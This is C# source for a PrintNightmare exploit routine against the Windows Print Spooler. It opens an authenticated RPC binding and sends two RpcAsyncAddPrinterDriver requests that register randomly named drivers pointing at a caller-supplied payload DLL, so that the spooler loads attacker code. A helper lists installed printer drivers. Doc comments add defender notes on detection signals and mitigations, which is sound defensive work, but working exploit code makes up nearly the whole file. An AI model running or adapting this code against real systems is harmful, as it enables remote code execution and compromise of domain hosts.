/// <summary>
/// Runs the PrintNightmare printer-driver installation sequence against
/// <paramref name="target"/> over an authenticated RPC binding.
/// </summary>
/// <remarks>
/// Steps visible in this method:
/// 1. create the binding, resolve its endpoint and set the object UUID
///    (<c>PAR_ObjectUUID</c>);
/// 2. ask the target for a driver directory via <c>FindDriverPath</c> and append
///    <c>\unidrv.dll</c> to it;
/// 3. send one add-driver request whose config file is
///    <c>C:\Windows\System32\kernelbase.dll</c>;
/// 4. send a second request whose config file is only the file name of
///    <paramref name="exploit_path"/>.
///
/// Defender notes: both requests register a driver under a fresh
/// <c>RandomString(10)</c> name with <c>pDataFile</c> set to
/// <paramref name="exploit_path"/>, so a fixed driver name is not a usable
/// indicator. More stable signals are driver-added records (Event ID 316 in the
/// Microsoft-Windows-PrintService/Operational log, when that log is enabled), new
/// files under the spooler's <c>spool\drivers\x64\3</c> directory, and
/// <c>spoolsv.exe</c> loading modules from that directory. Exposure is reduced by
/// current spooler patches, by stopping the Print Spooler service on hosts that do
/// not print (domain controllers in particular), and by the
/// <c>RestrictDriverInstallationToAdministrators</c> Point and Print policy.
/// </remarks>
/// <param name="target">Host the RPC binding is created against.</param>
/// <param name="exploit_path">Path placed in <c>pDataFile</c>; its last '\'-separated segment is the second request's config file.</param>
/// <param name="authuser">User name passed to <c>DCSync.CreateBinding</c>.</param>
/// <param name="authdomain">Domain passed to <c>DCSync.CreateBinding</c>.</param>
/// <param name="authpassword">Password passed to <c>DCSync.CreateBinding</c>.</param>
/// <param name="auth">RPC authentication service constant; defaults to <c>DCSync.RPC_C_AUTHN_GSS_NEGOTIATE</c>.</param>
/// <param name="altservice">Service class passed to <c>DCSync.CreateBinding</c>; defaults to "host".</param>
/// <returns><c>true</c> only when both add-driver requests report success; <c>false</c> otherwise.</returns>
public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host")
{
    Console.WriteLine("[*] ");

    // The binding is stored in the shared rpcConn field and requested with
    // delegate-level impersonation. It is not released on any path in this method.
    rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE);
    if (rpcConn == IntPtr.Zero)
    {
        Console.WriteLine("Error CreateBinding");
        return false;
    }

    NTSTATUS resolveStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());
    if (resolveStatus != NTSTATUS.Success)
    {
        Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)resolveStatus);
        return false;
    }

    NTSTATUS objectStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID);
    if (objectStatus != NTSTATUS.Success)
    {
        // NOTE(review): the message names RpcBindingSetOption although the failing
        // call is RpcBindingSetObject; the text is kept as the author wrote it.
        Console.WriteLine("[x] Error RpcBindingSetOption {0}", (int)objectStatus);
        return false;
    }

    // FindDriverPath is defined elsewhere; presumably it returns the directory of
    // an already-installed driver on the target - confirm against its definition.
    string driverpath = FindDriverPath(rpcConn) + "\\unidrv.dll";
    Console.WriteLine("[*] DriverPath: {0}", driverpath);

    DRIVER_INFO_2 driverInfo = new DRIVER_INFO_2();
    driverInfo.cVersion = 3;
    driverInfo.pDataFile = exploit_path;
    driverInfo.pEnvironment = "Windows x64";
    driverInfo.pDriverPath = driverpath;
    driverInfo.pName = RandomString(10);

    // First request: the config file is a full path to a system DLL.
    if (!AddPrinterDriver(driverInfo, rpcConn, "C:\\Windows\\System32\\kernelbase.dll"))
    {
        return false;
    }

    // Second request: new driver name, config file given by bare file name only
    // (AddPrinterDriver expands a bare name to the x64\3 driver directory).
    driverInfo.pName = RandomString(10);
    string[] segments = exploit_path.Split('\\');
    string leafName = segments[segments.Length - 1];
    if (!AddPrinterDriver(driverInfo, rpcConn, leafName))
    {
        return false;
    }

    Console.WriteLine();
    return true;
}
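/// <summary>
/// Returns the names of the printer drivers that EnumPrinterDrivers reports at
/// information level 2 (DRIVER_INFO_2), called with null server and environment
/// arguments.
/// </summary>
/// <remarks>
/// Uses the two-call pattern: a first call with a zero-length buffer is expected to
/// fail with ERROR_INSUFFICIENT_BUFFER and report the required size in bytes, and a
/// second call fills a buffer of that size.
/// </remarks>
/// <returns>One entry per returned DRIVER_INFO_2 structure, holding its pName.</returns>
/// <exception cref="InvalidOperationException">The size probe unexpectedly succeeded.</exception>
/// <exception cref="Win32Exception">Either call failed with an unexpected Win32 error.</exception>
List <String> GetInstalledPrinterDrivers()
{
    const int ErrorInsufficientBuffer = 122;

    uint cbNeeded = 0;
    uint cReturned = 0;

    // Size probe: a zero-length buffer must be rejected as too small.
    if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
    {
        throw new InvalidOperationException("EnumPrinterDrivers should fail!");
    }

    // Assumes the EnumPrinterDrivers import sets SetLastError = true; the
    // declaration is outside this block - confirm.
    int lastWin32Error = Marshal.GetLastWin32Error();
    if (lastWin32Error != ErrorInsufficientBuffer)
    {
        throw new Win32Exception(lastWin32Error);
    }

    IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
    try
    {
        if (!EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
        {
            // The error code is read here, before the finally block frees the buffer.
            throw new Win32Exception(Marshal.GetLastWin32Error());
        }

        Type type = typeof(DRIVER_INFO_2);
        int increment = Marshal.SizeOf(type);
        List <String> result = new List <string>((int)cReturned);

        for (int i = 0; i < cReturned; i++)
        {
            // IntPtr.Add keeps the arithmetic pointer-sized. The previous
            // pAddr.ToInt32() throws OverflowException in a 64-bit process when
            // the address does not fit in 32 bits.
            IntPtr entry = IntPtr.Add(pAddr, i * increment);
            DRIVER_INFO_2 info = (DRIVER_INFO_2)Marshal.PtrToStructure(entry, type);
            result.Add(info.pName);
        }

        return result;
    }
    finally
    {
        // Free the unmanaged buffer on every path, including a failed second call
        // or a marshalling exception.
        Marshal.FreeHGlobal(pAddr);
    }
}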
/// <summary>
/// Marshals <paramref name="dvi2"/> into a level-2 DRIVER_CONTAINER and submits it
/// through <c>RpcAsyncAddPrinterDriver</c> on <paramref name="hBinding"/>.
/// </summary>
/// <remarks>
/// Every request carries APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER. A
/// <paramref name="cfg"/> with a backslash after its first character is used as the
/// config file path unchanged and adds APD_COPY_ALL_FILES. Any other value is
/// treated as a file name under <c>c:\windows\system32\spool\drivers\x64\3\</c> and
/// adds APD_COPY_NEW_FILES.
///
/// Defender notes: the config-file path is printed before the request is sent. On
/// the receiving host, add-driver requests that reference files outside the
/// spooler's driver directory, or freshly created files inside it, are the
/// behaviour worth alerting on.
///
/// NOTE(review): the two AllocHGlobal buffers are never released in this method.
/// Whether they can be freed right after the call depends on how the stub behind
/// <c>RpcAsyncAddPrinterDriver</c> consumes them, which is not visible here.
/// </remarks>
/// <param name="dvi2">Driver description; its <c>pConfigFile</c> is overwritten here.</param>
/// <param name="hBinding">RPC binding handle the request is sent on.</param>
/// <param name="cfg">Config file, either a path or a bare file name.</param>
/// <returns><c>true</c> when the call returns <c>NTSTATUS.Success</c>; otherwise <c>false</c>.</returns>
private static bool AddPrinterDriver(DRIVER_INFO_2 dvi2, IntPtr hBinding, string cfg)
{
    // APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
    uint installFlags = 0x00000010 | 0x8000;

    bool hasDirectoryPart = cfg.IndexOf('\\') > 0;
    if (hasDirectoryPart)
    {
        dvi2.pConfigFile = cfg;
        installFlags |= 0x00000004; // APD_COPY_ALL_FILES
    }
    else
    {
        // Bare name (or leading backslash): resolve under the x64 version-3 driver directory.
        dvi2.pConfigFile = string.Format("c:\\windows\\system32\\spool\\drivers\\x64\\3\\{0}", cfg);
        installFlags |= 0x00000008; // APD_COPY_NEW_FILES
    }

    Console.WriteLine("[!] ConfigFile: {0}", dvi2.pConfigFile);

    // Copy the driver description into unmanaged memory.
    IntPtr driverInfoBuffer = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_INFO_2)));
    Marshal.StructureToPtr(dvi2, driverInfoBuffer, false);

    // The container points at that description and is itself marshalled.
    DRIVER_CONTAINER container = new DRIVER_CONTAINER();
    container.Level = 2;
    container.DriverInfo = driverInfoBuffer;

    IntPtr containerBuffer = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(DRIVER_CONTAINER)));
    Marshal.StructureToPtr(container, containerBuffer, false);

    NTSTATUS status = (NTSTATUS)RpcAsyncAddPrinterDriver(GetStubPtr(), GetProcStringPtr(116), hBinding, null, containerBuffer, installFlags);
    if (status != NTSTATUS.Success)
    {
        Console.WriteLine("[x] KO! " + status);
        return false;
    }

    Console.WriteLine("[*] OK!");
    return true;
}